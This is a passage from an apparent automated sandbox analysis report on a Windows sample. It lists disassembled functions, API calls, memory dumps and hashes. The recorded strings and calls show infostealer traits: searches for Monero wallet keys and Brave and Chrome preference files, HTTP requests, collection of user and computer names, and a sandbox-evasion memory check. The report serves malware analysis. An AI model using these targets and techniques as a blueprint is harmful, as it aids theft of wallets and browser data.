                              • __aulldiv.LIBCMT ref: 00A51266
                              • ExitProcess.KERNEL32 ref: 00A51294
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: e7e47117297989045d1e573a10b24e338014269caead82af1eabd4251840b7ea
                              • Instruction ID: e959083fafae1c755b9c06cc8a38110ab49983685dbacdcf15e06db7f44498a2
                              • Opcode Fuzzy Hash: e7e47117297989045d1e573a10b24e338014269caead82af1eabd4251840b7ea
                              • Instruction Fuzzy Hash: FE014BF0D44308BAEB10DBE1CD4ABAEBB78BB14706F208059EA05B6280D67455858B99
                              Function 00A66AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 a66af3 1451 a66b0a 1450->1451 1453 a66b0c-a66b22 call a66920 call a65b10 CloseHandle ExitProcess 1451->1453 1454 a66aba-a66ad7 call a6aad0 OpenEventA 1451->1454 1459 a66af5-a66b04 CloseHandle Sleep 1454->1459 1460 a66ad9-a66af1 call a6aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01448B38,?,00A7110C,?,00000000,?,00A71110,?,00000000,00A70AEF), ref: 00A66ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A66AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00A66AF9
                              • Sleep.KERNEL32(00001770), ref: 00A66B04
                              • CloseHandle.KERNEL32(?,00000000,?,01448B38,?,00A7110C,?,00000000,?,00A71110,?,00000000,00A70AEF), ref: 00A66B1A
                              • ExitProcess.KERNEL32 ref: 00A66B22
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: c8359e628b3826ac7353047f35405aab3a0ee9737f5b7465ce4d2ea8ee35dafd
                              • Instruction ID: 6e1b2a311ef2c5777da181527685f95b9161af10fed1dbcd450be596b2e2b959
                              • Opcode Fuzzy Hash: c8359e628b3826ac7353047f35405aab3a0ee9737f5b7465ce4d2ea8ee35dafd
                              • Instruction Fuzzy Hash: D0F01C70A80219EFE710BBE0DD1ABBE7B74FB28741F108516F913A51D1DBB05540DAA6
                              Function 00A547B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A54839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: e752f67d14f9d9aa814918cb00be3aede1fffc29549acde314be0cefeb81f7e8
                              • Instruction ID: 23ac7077e7b84a98d59b59c5081157a7033adc4a938644c49be4135f144c0d13
                              • Opcode Fuzzy Hash: e752f67d14f9d9aa814918cb00be3aede1fffc29549acde314be0cefeb81f7e8
                              • Instruction Fuzzy Hash: 322130B1D00209ABDF14EFA4E94ABDE7B74FB44350F108625F915A72D0DB706609CF91
                              Function 00A651F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A56280: InternetOpenA.WININET(00A70DFE,00000001,00000000,00000000,00000000), ref: 00A562E1
                                • Part of subcall function 00A56280: StrCmpCA.SHLWAPI(?,0144F340), ref: 00A56303
                                • Part of subcall function 00A56280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A56335
                                • Part of subcall function 00A56280: HttpOpenRequestA.WININET(00000000,GET,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A56385
                                • Part of subcall function 00A56280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A563BF
                                • Part of subcall function 00A56280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A563D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A65228
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 7b20c2f9a1ab95e30f72a55dfc042fef0e513427440b143587ca532967477b9b
                              • Instruction ID: e89e2eeb5ccca1390d32e8ef5242347651ba90ae217df9d8fd4f05b7ce84c773
                              • Opcode Fuzzy Hash: 7b20c2f9a1ab95e30f72a55dfc042fef0e513427440b143587ca532967477b9b
                              • Instruction Fuzzy Hash: 5211F170910148A7CB14FF74DE52AED7378AF70340F408554F91A67592EF306B06CB91
                              Function 00A51110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A5112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00A51132
                              • ExitProcess.KERNEL32 ref: 00A51143
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: dd2d40044074edf76df4002ad037eafb3cb4a44b30bbf21a833018c5d6ee613e
                              • Instruction ID: 8f2551f5896bd9c3d66bb05df6f36bbd8179117d1af8a0239e304db42fa911e4
                              • Opcode Fuzzy Hash: dd2d40044074edf76df4002ad037eafb3cb4a44b30bbf21a833018c5d6ee613e
                              • Instruction Fuzzy Hash: 4CE0E670A55308FBE7106BA09D0EB1D7678BB04B02F104155F709761D0D6B5264496D9
                              Function 00A510A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00A510B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00A510F7
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: d82073ab377a6cc270f30f6ecba7f8b4b27515fea08c7771e964b2c5e908509f
                              • Instruction ID: f7a5929dc0a872e410ed913609fb6cce1b95f5e64f4668c857d4fa58365a4967
                              • Opcode Fuzzy Hash: d82073ab377a6cc270f30f6ecba7f8b4b27515fea08c7771e964b2c5e908509f
                              • Instruction Fuzzy Hash: C5F0E271641208BBEB149BA4AC4AFBEB7ECE705B15F300448F904E3280D5719E04CAA5
                              Function 00A51190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67910
                                • Part of subcall function 00A678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A67917
                                • Part of subcall function 00A678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A6792F
                                • Part of subcall function 00A67850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A511B7), ref: 00A67880
                                • Part of subcall function 00A67850: RtlAllocateHeap.NTDLL(00000000), ref: 00A67887
                                • Part of subcall function 00A67850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A6789F
                              • ExitProcess.KERNEL32 ref: 00A511C6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 253781d2b97c7d75a0230c79f3eab346af91f3bc1902ba677f422acf8df958c1
                              • Instruction ID: afaeca3f0a1e658972edc964544675c4964723c1af25cb754ba6b6cfa3eb989a
                              • Opcode Fuzzy Hash: 253781d2b97c7d75a0230c79f3eab346af91f3bc1902ba677f422acf8df958c1
                              • Instruction Fuzzy Hash: F9E012B592470157DA0077F0AD0FB3E32AC6B1438EF040969FE05D3103FE29E95585A6

                              Non-executed Functions

                              Function 00A638B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00A638CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00A638E3
                              • lstrcat.KERNEL32(?,?), ref: 00A63935
                              • StrCmpCA.SHLWAPI(?,00A70F70), ref: 00A63947
                              • StrCmpCA.SHLWAPI(?,00A70F74), ref: 00A6395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A63C67
                              • FindClose.KERNEL32(000000FF), ref: 00A63C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 4b5876fb9adb8dd9cf8929738387bef37a56fbbb0a7891323557903cba5dfc80
                              • Instruction ID: d6819daa0f5f883c23b816fac028d6ca805998bfdffe2ef3f3d1ac82f9ca7c52
                              • Opcode Fuzzy Hash: 4b5876fb9adb8dd9cf8929738387bef37a56fbbb0a7891323557903cba5dfc80
                              • Instruction Fuzzy Hash: 9BA123B2A00218ABDF24DFA4DD89FEE7378BB58301F044589F60D96141EB759B85CF92
                              Function 00A5BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00A70B32,00A70B2B,00000000,?,?,?,00A713F4,00A70B2A), ref: 00A5BEF5
                              • StrCmpCA.SHLWAPI(?,00A713F8), ref: 00A5BF4D
                              • StrCmpCA.SHLWAPI(?,00A713FC), ref: 00A5BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5C7BF
                              • FindClose.KERNEL32(000000FF), ref: 00A5C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 7580ba432eacf0a05a829202f1b459b4cf2d6e999c761565d56c0b4afe8b41fc
                              • Instruction ID: 61464e46445eb7d5e392befbfd5de4c406cf9d6e2a1f5c04b9f657fc903b4a48
                              • Opcode Fuzzy Hash: 7580ba432eacf0a05a829202f1b459b4cf2d6e999c761565d56c0b4afe8b41fc
                              • Instruction Fuzzy Hash: 6E42F572910104ABDB14FB70DE96EED737DAFA4300F408559B90AA7191EE349B49CFA2
                              Function 00A64910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00A6492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00A64943
                              • StrCmpCA.SHLWAPI(?,00A70FDC), ref: 00A64971
                              • StrCmpCA.SHLWAPI(?,00A70FE0), ref: 00A64987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A64B7D
                              • FindClose.KERNEL32(000000FF), ref: 00A64B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
